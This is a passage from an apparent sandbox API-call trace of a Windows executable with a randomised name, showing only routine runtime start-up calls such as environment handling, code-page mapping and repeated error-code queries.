lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0xf09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.727] FreeEnvironmentStringsW (penv=0x3979b8) returned 1 [0035.727] GetStartupInfoA (in: lpStartupInfo=0x22f644 | out: lpStartupInfo=0x22f644*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.728] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.728] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.728] SetHandleCount (uNumber=0x20) returned 0x20 [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] GetACP () returned 0x4e4 [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.728] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f624 | out: lpCPInfo=0x22f624) returned 1 [0035.728] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f0f0 | out: lpCPInfo=0x22f0f0) returned 1 [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22f080 | out: lpCharType=0x22f080) returned 1 [0035.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x22ee68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.728] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x22f104 | out: lpCharType=0x22f104) returned 1 [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.728] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x22ee38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.728] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.728] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ec28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x22f404, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x15:Aô<ö\"", lpUsedDefaultChar=0x0) returned 256 [0035.728] GetLastError () returned 0x0 [0035.728] SetLastError (dwErrCode=0x0) [0035.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f504, cbMultiByte=256, lpWideCharStr=0x22ee58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.729] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.729] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ec48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x22f304, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x15:Aô<ö\"", lpUsedDefaultChar=0x0) returned 256 [0035.729] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.729] SetLastError (dwErrCode=0x0) [0035.729] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.730] SetLastError (dwErrCode=0x0) [0035.730] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.731] GetLastError () returned 0x0 [0035.731] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.732] SetLastError (dwErrCode=0x0) [0035.732] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.733] SetLastError (dwErrCode=0x0) [0035.733] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.734] SetLastError (dwErrCode=0x0) [0035.734] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.735] SetLastError (dwErrCode=0x0) [0035.735] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError 